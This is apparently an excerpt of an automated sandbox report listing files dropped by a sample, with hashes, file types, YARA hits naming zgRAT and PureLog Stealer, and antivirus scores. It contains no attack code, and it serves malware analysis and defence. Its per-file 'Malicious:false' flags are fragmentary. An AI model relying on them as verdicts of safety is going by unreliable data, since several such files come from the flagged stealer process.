                                                          SSDEEP:6:HGO3o6feIL7NgojW2YlWufh8IkeYo82pE20ODWpxHXdg12xA7R:mO35WIL7KojpMhkJo8kvDWpx+R
                                                          MD5:8EAE611F6B016BA74D235420934CE4C0
                                                          SHA1:407A2358BF5D8C88D5C353CEB091CDB2A335BE05
                                                          SHA-256:C508E29AC5E5CACEFDB55A7590C8730E73D20AA67A2D82BE4DB26320B808E37E
                                                          SHA-512:DA7C09525463C92B1D457F6E8C7DD652BE461906D5A9D9D60CC1474097CCFEEA84542448A93D188244828049D1F963866386463348669223B8CC3F0AC2854EF3
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16272384
                                                          Entropy (8bit):2.4574169294943817
                                                          Encrypted:false
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          MD5:8213A9C837181823A4D58728637EAEB5
                                                          SHA1:F574EEC251D1695589C1E0E00AE167DFB39216EC
                                                          SHA-256:68129B517BC27AE2AD742008A7DEB67CC9C85209665F73C8FEA955C52F1EF33E
                                                          SHA-512:4B642F9D9B0F86CB83D2B7371BAF00AFEC1A1475BE85CCFAE08794CB6978B6BE2999BCAF6195351BCD446956F7639F71999FF182F932E3A0D66D935C5E832DAC
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with very long lines (791), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):791
                                                          Entropy (8bit):5.90803378664458
                                                          Encrypted:false
                                                          SSDEEP:24:0Rccc2NXhvr7GFsufLxpABnAwD0mhGERVQ:rNWGFRLABfP/M
                                                          MD5:CB6B6A3879943BFF324D292F0AA56219
                                                          SHA1:3B528AD67CFD37F34A78BBF030416609482836A5
                                                          SHA-256:E90057662317652E2151F630334E7F5B5042CE29D493C73A4CF7996292725318
                                                          SHA-512:1E93F82F27988E0F0C55282AF3AE4F0F76E36331A0890273EB387EC20AB1322DBBF823D368A31FF69545A2BE1A9D51BEF01D6478EB00D2E6B05B50829F546258
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16272384
                                                          Entropy (8bit):2.4574169294943817
                                                          Encrypted:false
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          MD5:8213A9C837181823A4D58728637EAEB5
                                                          SHA1:F574EEC251D1695589C1E0E00AE167DFB39216EC
                                                          SHA-256:68129B517BC27AE2AD742008A7DEB67CC9C85209665F73C8FEA955C52F1EF33E
                                                          SHA-512:4B642F9D9B0F86CB83D2B7371BAF00AFEC1A1475BE85CCFAE08794CB6978B6BE2999BCAF6195351BCD446956F7639F71999FF182F932E3A0D66D935C5E832DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):205
                                                          Entropy (8bit):5.758625743902791
                                                          Encrypted:false
                                                          SSDEEP:6:lf/DDw/RBNfX4kVbph/Ni8gUdL9SiWDdK3n:N//w/RHfX4ubD/OUxAin3n
                                                          MD5:EE1F14E391226AF7439E757E4EFB24B9
                                                          SHA1:3374AE5AEBF25D852A2261A34861390A4E4EAD96
                                                          SHA-256:4B5CDACAF4BBF7A2646D3679768420E1DB71FADED8BFEF606C653F9C35A680BF
                                                          SHA-512:B06019209A0721D4D02B0D9C83B92026FBCB1C2A1329890A77C3EAA845A79E2ED7022E1D1FA38A8DFEE187606A1BF6D7C65831A6F444872C209FCD335A4CB262
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16272384
                                                          Entropy (8bit):2.4574169294943817
                                                          Encrypted:false
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          MD5:8213A9C837181823A4D58728637EAEB5
                                                          SHA1:F574EEC251D1695589C1E0E00AE167DFB39216EC
                                                          SHA-256:68129B517BC27AE2AD742008A7DEB67CC9C85209665F73C8FEA955C52F1EF33E
                                                          SHA-512:4B642F9D9B0F86CB83D2B7371BAF00AFEC1A1475BE85CCFAE08794CB6978B6BE2999BCAF6195351BCD446956F7639F71999FF182F932E3A0D66D935C5E832DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xec217c5f, page size 16384, DirtyShutdown, Windows version 10.0
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.6585780393318533
                                                          Encrypted:false
                                                          SSDEEP:1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                          MD5:D43685D49FBAE1D9F08317AAACF55D26
                                                          SHA1:C553B709B9FF1F90A934D5567D0EE286E8616F37
                                                          SHA-256:29C9B19A55B59E5A70E0925288072DDB7C42EBDA20755B581AFAA3F33CAA7608
                                                          SHA-512:96BEEC421E0041E782E803F77A11859421100B4375CD21974752AE7752DFDE996A0E562EFEB0F5264F7CC57E469EA581F42C9316984A965D351A7CFCACFEC1C7
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1915
                                                          Entropy (8bit):5.363869398054153
                                                          Encrypted:false
                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                          MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                          SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                          SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                          SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:CSV text
                                                          Category:dropped
                                                          Size (bytes):847
                                                          Entropy (8bit):5.354334472896228
                                                          Encrypted:false
                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                          MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                          SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                          SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                          SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):19253
                                                          Entropy (8bit):5.005753878328145
                                                          Encrypted:false
                                                          SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                          MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                          SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                          SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                          SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64
                                                          Entropy (8bit):1.1628158735648508
                                                          Encrypted:false
                                                          SSDEEP:3:Nlllul5mxllp:NllU4x/
                                                          MD5:3A925CB766CE4286E251C26E90B55CE8
                                                          SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                                          SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                                          SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):155648
                                                          Entropy (8bit):0.5407252242845243
                                                          Encrypted:false
                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136413900497188
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                          MD5:429F49156428FD53EB06FC82088FD324
                                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8746135976761988
                                                          Encrypted:false
                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):5242880
                                                          Entropy (8bit):0.03859996294213402
                                                          Encrypted:false
                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Sun Oct 20 17:18:49 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1928
                                                          Entropy (8bit):4.610078709293515
                                                          Encrypted:false
                                                          SSDEEP:48:9kLzWq482KqxmslmuulB+hnqXSfbNtmh7:9knWhfKqEs2TkZzNty7
                                                          MD5:40B5B46FC5A04E05DD97443F23282630
                                                          SHA1:07C7C0E923D16C6606E28DE86492865A17B5B1D1
                                                          SHA-256:4D78CF33A21AEBD632E94BD8D72C5851AABBED63805A527BEE55BCF3AEFEA7DF
                                                          SHA-512:F359C144DF01F043EA2AE0CCD0D491AC91664835A5EE4D4FE9D9E9B63552886E0FABD0CE87A40898826BCAAD7EBB8B2EDC9899FB088556C28FE16EECE67C8A25
                                                          Malicious:false
                                                          Preview:L...y;.g.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Y....c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP......................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES9645.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sun Oct 20 17:18:49 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1956
                                                          Entropy (8bit):4.5534351157851045
                                                          Encrypted:false
                                                          SSDEEP:24:HVO9/OX/qHmwKqxmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:HX/qlKqxmEluOulajfqXSfbNtmh1Z
                                                          MD5:ECFAA6E0717A87E71ED8D046774ACD28
                                                          SHA1:D8D630019BA70F2EA5DB86C6872B90D5655BF6CC
                                                          SHA-256:56D72796D290175A8C7E506FAB82ED75B18939554617D3151AE90A7863ACA6EC
                                                          SHA-512:A766C632A90F549A0B76800DF16F76092F2D19E29AFDE8447B2587EF1133C3B8269599CB0C57B4DB75DCB14F13ED438DAB6543EBB7A3139CB664962B92CC409E
                                                          Malicious:false
                                                          Preview:L...y;.g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES97EB.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):159744
                                                          Entropy (8bit):0.5394293526345721
                                                          Encrypted:false
                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                          Malicious:false
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):14
                                                          Entropy (8bit):3.378783493486176
                                                          Encrypted:false
                                                          SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                          MD5:6CA4960355E4951C72AA5F6364E459D5
                                                          SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                          SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                          SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                          Malicious:false
                                                          Preview:{"Surveys":{}}
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
